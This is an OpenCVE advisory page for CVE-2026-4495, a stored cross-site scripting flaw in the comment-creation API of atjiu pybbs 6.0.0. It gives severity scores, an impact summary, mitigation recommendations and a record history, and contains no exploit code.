Description
A security flaw has been discovered in atjiu pybbs 6.0.0. This impacts the function create of the file src/main/java/co/yiiu/pybbs/controller/api/CommentApiController.java. The manipulation results in cross site scripting. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks.
Published: 2026-03-20
Score: 5.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Cross‑Site Scripting
Action: Assess Impact
AI Analysis

Impact

A flaw was discovered in atjiu pybbs 6.0.0 that affects the create method of the CommentApiController. The API allows a malicious user to supply script code that is stored and then returned in the rendered page. The stored payload can be executed in the browsers of visitors, enabling the attacker to run arbitrary JavaScript in the victim’s context. The weakness aligns with CWE‑79 and may also involve code injection concerns expressed through CWE‑94.

Affected Systems

The affected product is atjiu pybbs version 6.0.0. No other versions are explicitly mentioned, and no vendor statement indicates that it is fixed in later releases. The system is a Java‑based web forum application that exposes a REST endpoint for comment creation.

Risk and Exploitability

The CVSS assessment gives the vulnerability a score of 5.1, placing it in the medium severity range. The EPSS probability is less than 1 %, indicating a low exploitation likelihood at present. The issue has been publicly disclosed and an exploit is available, and it is not listed in the CISA KEV catalog. Based on the description, it is inferred that the attack vector involves a remote user submitting a crafted comment through the exposed API endpoint, which bypasses input sanitization and injects script code into the page.

Generated by OpenCVE AI on April 15, 2026 at 09:05 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Determine if the installed atjiu pybbs version is 6.0.0 and check for a newer release or vendor‑provided update that removes the flaw.
  • Apply input validation and HTML‑escaping routines on comment payloads so that any script content is neutralised before being stored or rendered.
  • Restrict the CommentApi endpoint to authenticated users or temporarily block external traffic to the endpoint while mitigation steps are in place.

Generated by OpenCVE AI on April 15, 2026 at 09:05 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Mon, 23 Mar 2026 10:00:00 +0000

Type Values Removed Values Added
First Time appeared Atjiu
Atjiu pybbs
Vendors & Products Atjiu
Atjiu pybbs

Fri, 20 Mar 2026 22:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 20 Mar 2026 18:15:00 +0000

Type Values Removed Values Added
Description A security flaw has been discovered in atjiu pybbs 6.0.0. This impacts the function create of the file src/main/java/co/yiiu/pybbs/controller/api/CommentApiController.java. The manipulation results in cross site scripting. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks.
Title atjiu pybbs CommentApiController.java create cross site scripting
Weaknesses CWE-79
CWE-94
References
Metrics cvssV2_0

{'score': 4, 'vector': 'AV:N/AC:L/Au:S/C:N/I:P/A:N/E:POC/RL:ND/RC:UR'}

cvssV3_0

{'score': 3.5, 'vector': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R'}

cvssV3_1

{'score': 3.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R'}

cvssV4_0

{'score': 5.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P'}

Subscriptions

Atjiu Pybbs
cve-icon MITRE

Status: PUBLISHED

Assigner: VulDB

Published:

Updated: 2026-03-20T21:26:31.515Z

Reserved: 2026-03-20T08:38:45.780Z

Link: CVE-2026-4495

cve-icon Vulnrichment

Updated: 2026-03-20T21:26:26.203Z

cve-icon NVD

Status : Deferred

Published: 2026-03-20T18:16:18.000

Modified: 2026-04-29T01:00:01.613

Link: CVE-2026-4495

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-15T16:45:09Z

Weaknesses